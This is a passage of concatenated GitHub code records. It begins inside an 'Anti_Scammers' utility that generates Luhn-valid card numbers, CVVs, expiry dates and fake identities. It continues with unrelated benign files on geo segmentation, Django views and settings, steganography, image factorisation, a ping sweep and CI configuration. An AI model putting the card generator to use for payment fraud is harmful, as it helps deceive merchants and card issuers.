Juan\",\n        \"San Luis\",\n        \"Santa Cruz\",\n        \"Santa Fe\",\n        \"Santiago del Estero\",\n        \"Tierra del Fuego\",\n        \"Tucumán\",\n    ]\n\n    return VProvincia[randrange(0, len(VProvincia))]\n\n\ndef Domicilio():\n\n    VDomicilio = [\n        \"Lavalle 191\",\n        \"Gernica 923\",\n        \"Madariaga 781\",\n        \"Mendoza 186\",\n        \"Formosa 784\",\n        \"San Martin 675\",\n        \"Jujuy 751\",\n        \"Saigon 684\",\n        \"Norte 1679\",\n        \"Bahia 9712\",\n        \"Madrid 191\",\n        \"Paris 923\",\n        \"Moscu 781\",\n        \"Dacota 186\",\n        \"Maldonado 784\",\n        \"Lujan 675\",\n        \"Rivadavia 751\",\n        \"Pekin 684\",\n        \"Barcelona 1679\",\n        \"Bombai 9712\",\n    ]\n\n    return VDomicilio[randrange(0, len(VDomicilio))]\n\n\ndef compara(i, aleat, dni):\n\n    for j in range(i):\n\n        if aleat == dni[j]:\n\n            return False\n\n    return True\n\n\ndef Dni(num):\n\n    dni = []\n\n    dni.append(randrange(10, 10001))\n\n    for i in range(num):\n\n        aleat = randrange(10, 10001)\n\n        a = compara(i, aleat, dni)\n\n        if a == True:\n\n            dni.append(aleat)\n\n        elif a == False:\n\n            i = i - 1\n\n    return dni\n\n\n# generate random mobile phone numbers\ndef create_phone():\n    # Second digit\n    second = [3, 4, 5, 7, 8][random.randint(0, 4)]\n    # Third digit\n    third = {\n        3: random.randint(0, 9),\n        4: [5, 7, 9][random.randint(0, 2)],\n        5: [i for i in range(10) if i != 4][random.randint(0, 8)],\n        7: [i for i in range(10) if i not in [4, 9]][random.randint(0, 7)],\n        8: random.randint(0, 9),\n    }[second]\n    # Last eight digits\n    suffix = random.randint(9999999, 100000000)\n    # Assemble the phone number\n    return \"1{}{}{}\".format(second, third, suffix)\n    # Generate a mobile phone number\n\n\n# print(celular)\n\n\n# CHECKER BASED ON THE LUHN ALGORITHM\ndef cardLuhnChecksumIsValid(card_number):\n    \"\"\"checks to make sure that the card passes a luhn mod-10 checksum\"\"\"\n\n    sum = 0\n    num_digits = len(card_number)\n    oddeven = num_digits & 1\n\n    for count in range(0, num_digits):\n        digit = int(card_number[count])\n\n        if not ((count & 1) ^ oddeven):\n            digit = digit * 2\n        if digit > 9:\n            digit = digit - 9\n\n        sum = sum + digit\n\n    return (sum % 10) == 0\n\n\n# GENERATES A CARD NUMBER FROM A BIN TEMPLATE XXXXXXXXXXXXXXXX\n\n\ndef ccgen(bin_format):\n    out_cc = \"\"\n    if len(bin_format) == 16:\n        # Iteration over the bin\n        for i in range(15):\n            if bin_format[i] in (\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"):\n                out_cc = out_cc + bin_format[i]\n                continue\n            if bin_format[i] in (\"x\"):\n                out_cc = out_cc + str(randint(0, 9))\n\n        # Generate checksum (last digit) -- IMPLICIT CHECK\n        for i in range(10):\n            checksum_check = out_cc\n            checksum_check = checksum_check + str(i)\n\n            if cardLuhnChecksumIsValid(checksum_check):\n                out_cc = checksum_check\n                break\n            else:\n                checksum_check = out_cc\n\n    return out_cc\n\n\n# Write to a file; takes a list as the argument\ndef save(generated):\n    now = datetime.datetime.now()\n    file_name = \"cc-gen_output_{0}.txt\".format(\n        str(now.day) + str(now.hour) + str(now.minute) + str(now.second)\n    )\n    f = open(file_name, \"w\")\n    for line in generated:\n        f.write(line + \"\\n\")\n    f.close()\n\n\n# Random ccv gen\ndef ccvgen():\n    ccv = \"\"\n    num = randint(10, 999)\n\n    if num < 100:\n        ccv = \"0\" + str(num)\n    else:\n        ccv = str(num)\n\n    return ccv\n\n\n# postal code\ndef codigo_postal_gen():\n    postal = \"\"\n    num = randint(1000, 9999)\n\n    if num < 1000:\n        postal = \"0\" + str(num)\n    else:\n        postal = str(num)\n\n    return postal\n\n\ndef email_gen():\n    random.seed()\n    correoz = [\"@gmail.com\", \"@hotmail.com\", \"@live.com\", \"@yahoo.com\"]\n    email = 
Nombre() + Apellidos() + random.choice(correoz)\n return email\n\n\n# Random exp date\ndef dategen():\n now = datetime.datetime.now()\n date = \"\"\n month = str(randint(1, 12))\n current_year = str(now.year)\n year = str(randint(int(current_year[-2:]) + 1, int(current_year[-2:]) + 6))\n date = month + \"|\" + year\n\n return date\n","repo_name":"0x01x02x03/Anti_Scammers","sub_path":"utility_card_gen.py","file_name":"utility_card_gen.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31461441523","text":"import csv\nimport math\n\nclass GeoLine:\n\n def __init__(self, coords_one, coords_two):\n if coords_one[0] < coords_two[0]:\n self.start = coords_one\n self.end = coords_two\n elif coords_one[0] > coords_two[0]:\n self.start = coords_two\n self.end = coords_one\n else:\n if coords_one[1] < coords_two[1]:\n self.start = coords_one\n self.end = coords_two\n else:\n self.start = coords_two\n self.end = coords_one\n \n def __str__(self):\n return (self.start, self.end).__str__()\n \n def ray_intersection(self, line):\n line1_lat_start = self.start[0]\n line1_lon_start = self.start[1]\n line1_lat_end = self.end[0]\n line1_lon_end = self.end[1]\n\n line2_lat_start = line.start[0]\n line2_lon_start = line.start[1]\n line2_lat_end = line.end[0]\n line2_lon_end = line.end[1]\n \n line1_lon_const = False\n line2_lon_const = False\n \n slope1 = self.slope()\n if math.isnan(slope1):\n line1_lon_const = True\n \n slope2 = line.slope()\n if math.isnan(slope2):\n line2_lon_const = True\n \n if (round(slope1, 12) == round(slope2, 12)):\n line1_lat_at_0 = round(self.lat(0), 12)\n line2_lat_at_0 = round(line.lat(0), 12)\n if line1_lat_at_0 == line2_lat_at_0:\n return self\n else:\n return math.nan\n elif (line1_lon_const and line2_lon_const):\n if line1_lon_start == line2_lon_start:\n return self\n else:\n return math.nan\n \n elif line1_lon_const:\n lon = line1_lon_start\n lat = line.lat(lon)\n \n elif line2_lon_const:\n lon = line2_lon_start\n lat = self.lat(lon)\n \n else:\n lon = (line2_lat_start -line1_lat_start - line2_lon_start*slope2 + line1_lon_start*slope1)/(slope1-slope2)\n lat= line1_lat_start + (lon - line1_lon_start) * slope1\n \n return (lat, lon)\n \n def slope(self):\n line1_lat_start = self.start[0]\n line1_lon_start = self.start[1]\n \n line1_lat_end = self.end[0]\n line1_lon_end = self.end[1]\n\n try:\n slope = (line1_lat_end - line1_lat_start)/(line1_lon_end - line1_lon_start)\n except ZeroDivisionError:\n slope = math.nan\n\n return slope\n \n def includes_point(self, point):\n \n point_lat = point[0]\n point_lon = point[1]\n \n line1_lat_start = self.start[0]\n line1_lon_start = self.start[1]\n\n line1_lat_end = self.end[0]\n line1_lon_end = self.end[1]\n \n if point_lat >= self.start[0] and point_lat <= self.end[0] and point_lon >= self.start[1] and point_lon <= self.end[1]:\n if point_lat == line1_lat_start + point_lon * (line1_lon_end - line1_lon_start)/(line1_lat_end - line1_lat_start):\n return True\n return False\n \n def lat(self,lon):\n line1_lat_start = self.start[0]\n lat = self.start[0] + (lon - self.start[1])*self.slope()\n return lat\n \n def intersects(self, line):\n line1_lat_min = round(min(self.start[0], self.end[0]), 12)\n line1_lat_max = round(max(self.start[0], self.end[0]), 12)\n line1_lon_min = round(min(self.start[1], self.end[1]), 12)\n line1_lon_max = round(max(self.start[1], self.end[1]), 12)\n \n line2_lat_min = round(min(line.start[0], line.end[0]), 
12)\n line2_lat_max = round(max(line.start[0], line.end[0]), 12)\n line2_lon_min = round(min(line.start[1], line.end[1]), 12)\n line2_lon_max = round(max(line.start[1], line.end[1]), 12)\n\n ray_intersection_point = self.ray_intersection(line)\n\n if isinstance(ray_intersection_point, float):\n if math.isnan(ray_intersection_point):\n return False\n else:\n raise ValueError('float that is non a nan was returned from the ray_intersection')\n elif ray_intersection_point == self:\n if line1_lat_min == line1_lat_max:\n return (line2_lon_min <= line1_lon_max and line2_lon_max >= line1_lon_min)\n else:\n return (line2_lat_min <= line1_lat_max and line2_lat_max >= line1_lat_min)\n elif isinstance(ray_intersection_point, tuple):\n lat = round(ray_intersection_point[0], 12)\n lon = round(ray_intersection_point[1], 12)\n return (line2_lat_min <= lat and line2_lat_max >= lat and\n line1_lat_min <= lat and line1_lat_max >= lat\n and\n line2_lon_min <= lon and line2_lon_max >= lon and\n line1_lon_min <= lon and line1_lon_max >= lon)\n else:\n raise ValueError('unexpected value returned from ray_intersection')\n \n def find_sections(self):\n lat_start = self.start[0]\n lon_start = self.start[1]\n lat_end = self.end[0]\n lon_end = self.end[1]\n \n rounded_lat_start = math.floor(self.start[0]*100)/100\n rounded_lon_start = math.floor(self.start[1]*100)/100\n rounded_lat_end = math.floor(self.end[0]*100)/100\n rounded_lon_end = math.floor(self.end[1]*100)/100\n \n sections = [(round(rounded_lat_start, 2), round(rounded_lon_start, 2))]\n \n if rounded_lat_start == rounded_lat_end and rounded_lon_start == rounded_lon_end:\n return sections\n \n if rounded_lat_start != rounded_lat_end:\n crossed_lats = round((rounded_lat_end - rounded_lat_start)*100)\n crossed_lons = round((rounded_lon_end - rounded_lon_start)*100)\n for i in range(0, crossed_lats + 1):\n for j in range(0, crossed_lons + 1):\n section_node = (round(rounded_lat_start + 0.01*i, 2), round(rounded_lon_start + 0.01*j, 2))\n if (section_node) not in sections:\n crossing_lat = GeoLine((rounded_lat_start + 0.01*i, rounded_lon_start + 0.01*j),\n (rounded_lat_start + 0.01*(i+1), rounded_lon_start + 0.01*j))\n crossing_lon = GeoLine((rounded_lat_start + 0.01*i, rounded_lon_start + 0.01*j),\n (rounded_lat_start + 0.01*i, rounded_lon_start + 0.01*(j + 1)))\n \n lat_crossed = self.intersects(crossing_lat)\n lon_crossed = self.intersects(crossing_lon)\n \n if lat_crossed or lon_crossed:\n sections.append(section_node)\n \n return sections\n\n\n \n# lat= line1_lat_start + (lon - line1_lon_start) * slope1\n# lat= line2_lat_start + (lon - line2_lon_start) * slope2\n \n# lon = (line2_lat_start - line1_lat_start) / \\\n# ( (line1_lon_end - line1_lon_start)/(line1_lat_end - line1_lat_start) -\\\n# (line2_lon_end - line2_lon_start)/(line2_lat_end - line2_lat_start) )\n\n# line1_lat_start + lon*slope1 - line1_lon_start*slope1 = line2_lat_start + lon*slope2 - line2_lon_start*slope2\n# lon(slope1-slope2) = line2_lat_start -line1_lat_start - line2_lon_start*slope2 + line1_lon_start*slope1\n \nif __name__ == '__main__': \n sections_dict = {}\n with open(\"E:\\Downloads\\Programming\\map\\sections.csv\", newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n key = '-'.join((row[2], row[3]))\n sections_dict[key] = row[0]\n \n with open(\"E:\\Downloads\\Programming\\map\\dp_view_01.csv\", newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n with 
open(\"E:\\Downloads\\Programming\\map\\mapped.sql\", \"w\") as result_file:\n result_file.truncate()\n result_file.write(\"INSERT INTO line_sections (section_id, qline_id) VALUES\\n\")\n for row in csvreader:\n line_id = row[0]\n\n lat_1 = float(row[1])\n lon_1 = float(row[2])\n lat_2 = float(row[3])\n lon_2 = float(row[4])\n\n g_line = GeoLine((lat_1, lon_1), (lat_2, lon_2))\n sections = g_line.find_sections()\n\n for section in sections:\n section_lat = section[0]\n section_lon = section[1]\n\n section_key = '{0:.3f}-{1:.3f}'.format(section_lat, section_lon)\n section_id = sections_dict[section_key]\n\n file_line = '({0}, {1}),\\n'.format(section_id, line_id)\n result_file.write(file_line)\n","repo_name":"Glider-of-chaos/map-segmentation","sub_path":"map_segmentation.py","file_name":"map_segmentation.py","file_ext":"py","file_size_in_byte":9032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17585028103","text":"from django.shortcuts import render,redirect\r\nfrom notification.models import UserObj,Notification\r\nfrom django.http import HttpResponseRedirect\r\n\r\n# Create your views here.\r\n\r\ndef seenNotification(request,pk):\r\n if request.user.is_authenticated:\r\n user_obj = UserObj.objects.get(user=request.user)\r\n notification_qs = Notification.objects.get(id=pk)\r\n notification_qs.userobj.remove(user_obj)\r\n notification_qs.is_read = True\r\n notification_qs.save()\r\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\r\n else:\r\n return redirect('login')\r\n","repo_name":"exact-coder/Fev_Ecom","sub_path":"notification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14011532475","text":"\"\"\"Added Tables\n\nRevision ID: 82eb555dafa6\nRevises: 1c22ae5fc9bf\nCreate Date: 2023-05-16 14:39:29.436473\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '82eb555dafa6'\ndown_revision = '1c22ae5fc9bf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('bikes')\n op.drop_table('lockers')\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('lockers',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('locker_location', sa.VARCHAR(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('bikes',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('name', sa.VARCHAR(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n","repo_name":"Dustin-Holloway/Phase-3-Group-Project-CLI","sub_path":"lib/db/migrations/versions/82eb555dafa6_added_tables.py","file_name":"82eb555dafa6_added_tables.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2461573628","text":"import aeidon\n\n\nclass SaveAgent(aeidon.Delegate):\n\n \"\"\"Writing subtitle data to file.\"\"\"\n\n def _save(self, doc, file, keep_changes):\n \"\"\"\n Write subtitle data from `doc` to `file`.\n\n Return indices of texts changed due to markup conversion.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n current_format = self.get_format(doc)\n orig_texts = [x.get_text(doc) for x in self.subtitles]\n indices = []\n if current_format is not None and file.format != current_format:\n # Convert markup if saving in different format.\n converter = aeidon.MarkupConverter(current_format, file.format)\n for i, subtitle in enumerate(self.subtitles):\n text = subtitle.get_text(doc)\n new_text = converter.convert(text)\n if new_text == text: continue\n subtitle.set_text(doc, new_text)\n indices.append(i)\n file.write(self.subtitles, doc)\n if keep_changes: return indices\n for i, subtitle in enumerate(self.subtitles):\n subtitle.set_text(doc, orig_texts[i])\n return []\n\n @aeidon.deco.export\n def save(self, doc, file=None, keep_changes=True):\n \"\"\"\n Write subtitle data from `doc` to `file`.\n\n `file` can be ``None`` to use existing file.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n if doc == aeidon.documents.MAIN:\n return self.save_main(file, keep_changes)\n if doc == aeidon.documents.TRAN:\n return self.save_translation(file, keep_changes)\n raise ValueError(\"Invalid document: {!r}\".format(doc))\n\n @aeidon.deco.export\n def save_main(self, file=None, keep_changes=True):\n \"\"\"\n Write subtitle data from main document to `file`.\n\n `file` can be ``None`` to use :attr:`main_file`.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n file = file or self.main_file\n if file is not None and self.main_file is not None:\n file.copy_from(self.main_file)\n indices = self._save(aeidon.documents.MAIN, file, keep_changes)\n if keep_changes:\n if (self.main_file is not None and\n file.mode != self.main_file.mode):\n # Apply possibly changed mode (times vs. 
frames).\n                for i, subtitle in enumerate(self.subtitles):\n                    subtitle.mode = file.mode\n                self.emit(\"positions-changed\", self.get_all_indices())\n            self.main_file = file\n            self.main_changed = 0\n            self.emit(\"main-texts-changed\", indices)\n        self.emit(\"main-file-saved\", file)\n\n    @aeidon.deco.export\n    def save_translation(self, file=None, keep_changes=True):\n        \"\"\"\n        Write subtitle data from translation document to `file`.\n\n        `file` can be ``None`` to use :attr:`tran_file`.\n        Raise :exc:`IOError` if writing fails.\n        Raise :exc:`UnicodeError` if encoding fails.\n        \"\"\"\n        file = file or self.tran_file\n        if file is not None and self.tran_file is not None:\n            file.copy_from(self.tran_file)\n        indices = self._save(aeidon.documents.TRAN, file, keep_changes)\n        if keep_changes:\n            self.tran_file = file\n            self.tran_changed = 0\n            self.emit(\"translation-texts-changed\", indices)\n        self.emit(\"translation-file-saved\", file)\n","repo_name":"otsaloma/gaupol","sub_path":"aeidon/agents/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"19"}
{"seq_id":"6110488688","text":"from utils import *\n\n\ndef reveal_image(image_with_secret, nbits=1):\n    jpeg_trailer = \"1111\" + \"1111\" + \"1101\" + \"1001\"  # b\"\\xFF\\xD9\"\n\n    nbits = clamp(nbits, 1, 8)\n    image = image_with_secret.flatten()\n\n    message = \"\"\n    i = 0\n    while i < image_with_secret.size:\n        byte = bin(image[i])[2:].zfill(8)\n        message += byte[-nbits:]\n        i += 1\n\n    trailer_end_pos = len(jpeg_trailer)  # end index + 1\n    while trailer_end_pos <= image_with_secret.size:\n        if message[trailer_end_pos - len(jpeg_trailer): trailer_end_pos] == jpeg_trailer:\n            break\n        trailer_end_pos += 8\n\n    img_bits_str = message[:trailer_end_pos]\n\n    img_byte_chunks = [img_bits_str[i:i + 8] for i in range(0, len(img_bits_str), 8)]\n    img_bytes_list = [bytes([int(byte, base=2)]) for byte in img_byte_chunks]\n    img_bytes = b\"\".join(img_bytes_list)\n    return img_bytes\n\n\nif __name__ == \"__main__\":\n    image = load_image(\"images/rembrandt.png\")\n    nbits = 1\n    image_with_secret, _ = hide_image(image, \"images/spanish.jpg\", nbits)\n    revealed_img = reveal_image(image_with_secret, nbits)\n\n    revealed_img_path = \"images/revealed_img_no_length.jpg\"\n    with open(revealed_img_path, \"wb\") as f_img:\n        f_img.write(revealed_img)\n\n    plt.imshow(load_image(revealed_img_path))\n    plt.show()\n","repo_name":"plonajakub/image-engineering","sub_path":"lab5/exercises/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"72903504683","text":"#simple -- v2 of split\n#split.py\n\nimport sys\nimport math\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageOps\n\nfrom time import time\nfrom sklearn import decomposition\nfrom skimage import color, io, img_as_ubyte\n\n\ndef computeError(original, patterns):\n    inv = np.linalg.pinv(patterns)\n    c = np.matmul(original, inv)\n    m_hat = np.matmul(c, patterns)\n    return np.linalg.norm(original - m_hat)\n\ndef imageToMatrix(image, size):\n\ttiles = []\n\tresult = []\n\tfor y in range(image.height//size):\n\t\tfor x in range(image.width//size):\n\t\t\ttile = image.crop((x*size,y*size, (x+1)*size, (y+1)*size))\n\t\t\ttiles.append(tile)\n\n\tfor i in range(len(tiles)):\n\t\ta = np.asarray(tiles[i])\n\t\ta = a.flatten()\n\t\tresult.append(a)\n\treturn np.array(result)\n\ndef matrixToImage(tiles, width, 
height):\n\n\tsize = int(math.sqrt(len(tiles[0])))\n\tresult = Image.new('L', (width*size, height*size))\n\n\tindex = 0\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\ttile = tiles[index]\n\n\t\t\ttile = tile/np.max(tile)\n\t\t\ttile = tile*255\n\n\t\t\ttile = np.clip(np.rint(tile),a_min=0, a_max=255)\n\t\t\ttile = tile.astype(np.uint8)\n\n\t\t\timg = Image.fromarray(tile.reshape(size,size), mode=\"L\")\n\t\t\tresult.paste(img, (x*size, y*size, (x+1)*size, (y+1)*size))\n\t\t\tindex += 1\n\n\treturn result \n\nt0 = time()\nblockSize = 16\n\nsrc_img = Image.open('/scratch/prism2022data/training/AMRE/unit05-20150819003402_011372690_06947.png')\nsrc_img = ImageOps.grayscale(src_img)\nsrc_img = src_img.resize(((src_img.width//blockSize)*blockSize,(src_img.height//blockSize)*blockSize))\nprint(src_img.size)\n\n\ntile_matrix = imageToMatrix(src_img,blockSize)\nprint(tile_matrix)\n\n\n#n_samples, n_features = tile_matrix.shape\n#print('Samples: ' + str(n_samples))\n#print('Features: ' + str(n_features))\n\nn_components = 32\n\nprint(\"EXTRACTING THE TOP %d %s...\" % (n_components, 'Non-negative components - NMF'))\n#t0 = time()\nestim = decomposition.NMF(n_components=n_components, init='random', random_state=0, max_iter=10000, solver='mu')\nw = estim.fit_transform(tile_matrix)\n#train_time = (time() - t0)\n\n#print(\"Finished in %0.3fs\" % train_time)\n\nh = estim.components_\n\ne = computeError(tile_matrix, h) \nprint(f'ERROR: {e}')\n\nr_matrix = estim.inverse_transform(w)\n\n#print(recon)\n\nprint(r_matrix)\n\nresult_img = matrixToImage(r_matrix,src_img.width//blockSize, src_img.height//blockSize)\nresult_img.save(\"recon.png\")\n\npattern_img = matrixToImage(h,1, len(h))\npattern_img.save(\"patterns.png\")\n\nprint(h)\nprint(time() - t0)\n","repo_name":"jdymacek/MAFR","sub_path":"old/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4488534278","text":"import subprocess\nimport os\n\nimport sys\n\n\ndef ping(ip):\n rc = subprocess.call('ping -c2 {} &>/dev/null'.format(ip), shell=True)\n if rc == 0:\n return '{}: up'.format(ip)\n else:\n return '{}: down'.format(ip)\n\n\nif __name__ == '__main__':\n ips = ['192.168.83.{}'.format(i) for i in range(1, 255)]\n for ip in ips:\n pid = os.fork()\n if not pid:\n print(ping(ip), end='\\t')\n sys.exit()\n","repo_name":"east4ming/pyEdu","sub_path":"day17/fork_ping.py","file_name":"fork_ping.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22767350760","text":"from django.db import models\nfrom mptt.models import MPTTModel, TreeForeignKey\n\n\nclass Article(models.Model):\n \"\"\"Article\"\"\"\n title = models.CharField(max_length=200)\n content = models.CharField(max_length=10000)\n\n def __str__(self):\n return self.title\n\n\nclass Comment(MPTTModel):\n \"\"\"Comment\"\"\"\n name = models.CharField(max_length=100)\n text = models.TextField(max_length=5000)\n article = models.ForeignKey(\n Article, \n on_delete=models.CASCADE,\n related_name='comment'\n )\n parent = TreeForeignKey(\n 'self',\n on_delete=models.CASCADE,\n null=True, blank=True,\n related_name='children'\n )\n\n def __str__(self):\n return 
self.name\n","repo_name":"42afedorov42/myblog","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15334770471","text":"import os\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.celery import CeleryIntegration\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom sentry_sdk.integrations.redis import RedisIntegration\n\nfrom .base import *\n\nDEBUG = False\n\n\n# Application definition\n\nALLOWED_HOSTS = ['covid19.paschal.xyz']\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ.get('DB_NAME'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT')\n }\n}\n\n\n# Email settings\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = os.environ.get('EMAIL_HOST')\nEMAIL_PORT = os.environ.get('EMAIL_PORT')\nEMAIL_USE_TLS = True\nEMAIL_HOST_USER = os.environ.get('SENDGRID_USERNAME')\nEMAIL_HOST_PASSWORD = os.environ.get('SENDGRID_PASSWORD')\nSENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')\n\n\n# Celery\nCELERY_BROKER_URL = 'redis://localhost:6379'\nCELERY_BROKER_TRANSPORT = 'redis'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379'\nCELERY_ACCEPT_CONTENT = ['application/json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TIMEZONE = 'Africa/Lagos'\n\n\n# Sentry\nsentry_sdk.init(\n dsn=\"https://d5e034415489460c88bc7bb6904904fb@sentry.io/5186226\",\n integrations=[\n DjangoIntegration(),\n CeleryIntegration(),\n RedisIntegration()\n ]\n)\n","repo_name":"paschmaria/covid19_app","sub_path":"core/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13194025432","text":"import os\nfrom typing import TypedDict\n\n# This package contains utilities that rely on environment variable\n# definitions present only on the CI container instance.\n\n# environment variables needed by CI\nclass CIEnvironment(TypedDict):\n # If not running under a CI pipeline defaults are provided that\n # will suffice to run scripts that do not use GHA API calls.\n # To manually provide environment variable settings, export GITHUB_ACTIONS=true, and provide\n # values for all of the environment variables listed.\n GITHUB_ACTIONS: str\n\n # This is used as a unique tag for all instances launched in a workflow\n GITHUB_RUN_ID: str\n\n GITHUB_SHA: str\n\n # Multiple clones of the FireSim repository exists on manager. We expect state\n # to persist between jobs in a workflow and faciliate that by having jobs run\n # out of a centralized clone (MANAGER_FIRESIM_LOCATION)-- not the default clones setup by\n # the GHA runners (GITHUB_WORKSPACE)\n\n # This is the location of the clone setup by the GHA runner infrastructure by default\n # expanduser to replace the ~ present in the default, for portability\n GITHUB_WORKSPACE: str\n\n # This is the location of the reused clone. 
CI scripts should refer to variables\n    # derived from this path so that they may be reused across workflows that may\n    # initialize the FireSim repository differently (e.g., as a submodule of a\n    # larger project.)\n    MANAGER_FIRESIM_LOCATION: str\n\n    GITHUB_TOKEN: str\n    PERSONAL_ACCESS_TOKEN: str\n    GITHUB_API_URL: str\n\n    # We look this up, instead of hardcoding \"firesim/firesim\", to support running\n    # this CI pipeline under forks.\n    GITHUB_REPOSITORY: str\n\n    GITHUB_EVENT_PATH: str\n\n    # The following are environment variables used by AWS and AZURE to set up the corresponding\n    # self-hosted Github Actions Runners\n    AWS_ACCESS_KEY_ID: str\n    AWS_SECRET_ACCESS_KEY: str\n    AWS_DEFAULT_REGION: str\n    AZURE_CLIENT_ID: str\n    AZURE_CLIENT_SECRET: str\n    AZURE_TENANT_ID: str\n    AZURE_SUBSCRIPTION_ID: str\n    AZURE_DEFAULT_REGION: str\n    AZURE_RESOURCE_GROUP: str\n    AZURE_CI_SUBNET_ID: str\n    AZURE_CI_NSG_ID: str\n\n    FIRESIM_PEM: str\n    FIRESIM_PEM_PUBLIC: str\n\n    # FireSim repo used on local CI machine to run tests from (cached across all workflow CI jobs)\n    REMOTE_WORK_DIR: str\n\nRUN_LOCAL = os.environ.get('GITHUB_ACTIONS', 'false') == 'false'\n# When running locally (not in a CI pipeline) run commands out of the clone hosting this file.\nlocal_fsim_dir = os.path.normpath((os.path.realpath(__file__)) + \"/../../..\")\n\ndef get_ci_value(env_var: str, default_value: str = \"\") -> str:\n    if RUN_LOCAL:\n        return default_value\n    else:\n        return os.environ[env_var]\n\n# Create an env. dict that is populated from the environment or from defaults\nci_env: CIEnvironment = {\n    'GITHUB_ACTIONS': 'false' if RUN_LOCAL else 'true',\n    'GITHUB_RUN_ID': get_ci_value('GITHUB_RUN_ID'),\n    'GITHUB_SHA': get_ci_value('GITHUB_SHA'),\n    'GITHUB_WORKSPACE': os.path.expanduser(os.environ['GITHUB_WORKSPACE']) if not RUN_LOCAL else local_fsim_dir,\n    'MANAGER_FIRESIM_LOCATION': os.path.expanduser(os.environ['MANAGER_FIRESIM_LOCATION']) if not RUN_LOCAL else local_fsim_dir,\n    'GITHUB_TOKEN': get_ci_value('GITHUB_TOKEN'),\n    'PERSONAL_ACCESS_TOKEN': get_ci_value('PERSONAL_ACCESS_TOKEN'),\n    'GITHUB_API_URL': get_ci_value('GITHUB_API_URL'),\n    'GITHUB_REPOSITORY': get_ci_value('GITHUB_REPOSITORY'),\n    'GITHUB_EVENT_PATH': get_ci_value('GITHUB_EVENT_PATH'),\n    'AWS_ACCESS_KEY_ID': get_ci_value('AWS_ACCESS_KEY_ID'),\n    'AWS_SECRET_ACCESS_KEY': get_ci_value('AWS_SECRET_ACCESS_KEY'),\n    'AWS_DEFAULT_REGION': get_ci_value('AWS_DEFAULT_REGION'),\n    'AZURE_CLIENT_ID': get_ci_value('AZURE_CLIENT_ID'),\n    'AZURE_CLIENT_SECRET': get_ci_value('AZURE_CLIENT_SECRET'),\n    'AZURE_TENANT_ID': get_ci_value('AZURE_TENANT_ID'),\n    'AZURE_SUBSCRIPTION_ID': get_ci_value('AZURE_SUBSCRIPTION_ID'),\n    'AZURE_DEFAULT_REGION': get_ci_value('AZURE_DEFAULT_REGION'),\n    'AZURE_RESOURCE_GROUP': get_ci_value('AZURE_RESOURCE_GROUP'),\n    'AZURE_CI_SUBNET_ID': get_ci_value('AZURE_CI_SUBNET_ID'),\n    'AZURE_CI_NSG_ID': get_ci_value('AZURE_CI_NSG_ID'),\n    'FIRESIM_PEM': get_ci_value('FIRESIM_PEM'),\n    'FIRESIM_PEM_PUBLIC': get_ci_value('FIRESIM_PEM_PUBLIC'),\n    'REMOTE_WORK_DIR': 